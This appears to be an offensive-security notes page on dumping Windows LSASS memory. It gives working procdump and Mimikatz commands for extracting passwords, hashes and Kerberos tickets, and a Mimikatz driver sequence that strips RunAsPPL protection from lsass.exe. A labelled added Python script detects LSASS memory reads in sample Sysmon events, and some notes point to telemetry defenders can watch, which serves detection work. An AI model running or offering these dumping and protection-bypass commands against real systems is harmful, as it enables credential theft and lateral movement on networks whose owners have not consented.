Local Security Authority Subsystem Service (LSASS)
LSASS is a critical Windows system process responsible for performing security operations such as verifying logged-in accounts and storing sensitive data like passwords, hashes, and Kerberos tickets.
Dumping LSASS Process
To dump the LSASS process memory, you can use Task Manager or ProcDump from the Sysinternals Suite. Both approaches open a handle to lsass.exe with memory-read access, which is the behaviour endpoint telemetry such as Sysmon's ProcessAccess events records.
Using Task Manager:
Open Task Manager.
Locate and right-click the lsass.exe process, then select "Create Dump File" to save the dump locally.
Using Sysinternals Suite:
procdump.exe -accepteula -ma lsass.exe <DUMP FILE>
Extracting Credentials with Mimikatz
Mimikatz can be used to extract credentials from an LSASS dump.
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
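Both the dump methods above and a live sekurlsa::logonpasswords read lsass.exe memory, so the detection that matters is any process obtaining PROCESS_VM_READ on lsass.exe. The following is an added example (not part of the original page or of Mimikatz/Sysinternals) that triages constructed Sysmon Event ID 10 (ProcessAccess) records flattened to key=value text; the allowlist of expected readers is an assumption to tune per environment.

```python
import re

# Constructed Sysmon Event ID 10 records flattened to "Key=Value" text.
# These are sample inputs written for this example, not real telemetry.
SAMPLE_EVENTS = [
    r"EventID=10 SourceImage=C:\Windows\System32\Taskmgr.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Tools\procdump.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF",
    r"EventID=10 SourceImage=C:\Program Files\Windows Defender\MsMpEng.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1410",
    r"EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000",
    r"EventID=10 SourceImage=C:\Tools\procdump.exe TargetImage=C:\Windows\System32\notepad.exe GrantedAccess=0x1FFFFF",
]

# PROCESS_VM_READ is the access right a memory dump needs; 0x1FFFFF (all access) includes it.
PROCESS_VM_READ = 0x0010

# Source images expected to read lsass.exe memory (assumption: tune per environment).
ALLOWLIST = {r"c:\program files\windows defender\msmpeng.exe"}

# Lazy match up to the next " Key=" so values containing spaces (e.g. "Program Files") survive.
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Turn a flattened 'Key=Value Key=Value' record into a dict."""
    return {key: value for key, value in KV_RE.findall(line)}


def is_lsass_read(event):
    """True when a non-allowlisted process obtains memory-read access to lsass.exe."""
    if event.get("EventID") != "10":
        return False
    if not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0"), 16)
    if not granted & PROCESS_VM_READ:
        return False  # e.g. 0x1000 (query limited information) cannot read memory
    return event.get("SourceImage", "").lower() not in ALLOWLIST


def triage(lines):
    """Return (SourceImage, GrantedAccess) for each record that looks like an LSASS memory read."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if is_lsass_read(event):
            hits.append((event["SourceImage"], event["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for source, mask in triage(SAMPLE_EVENTS):
        print(f"LSASS memory read by {source} (GrantedAccess={mask})")
```

On the constructed input, Task Manager and procdump are flagged, Defender is allowlisted, the svchost open lacks PROCESS_VM_READ, and the procdump open of notepad.exe targets the wrong process.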
Bypassing LSASS Protection
LSASS protection (LSA runs as a Protected Process Light) is enabled by setting the RunAsPPL value (REG_DWORD, 1) under the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
To bypass this protection with Mimikatz (note that !+ loads Mimikatz's kernel driver, mimidrv, so this step needs administrative rights and produces a driver-load event that defenders can monitor):
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # sekurlsa::logonpasswords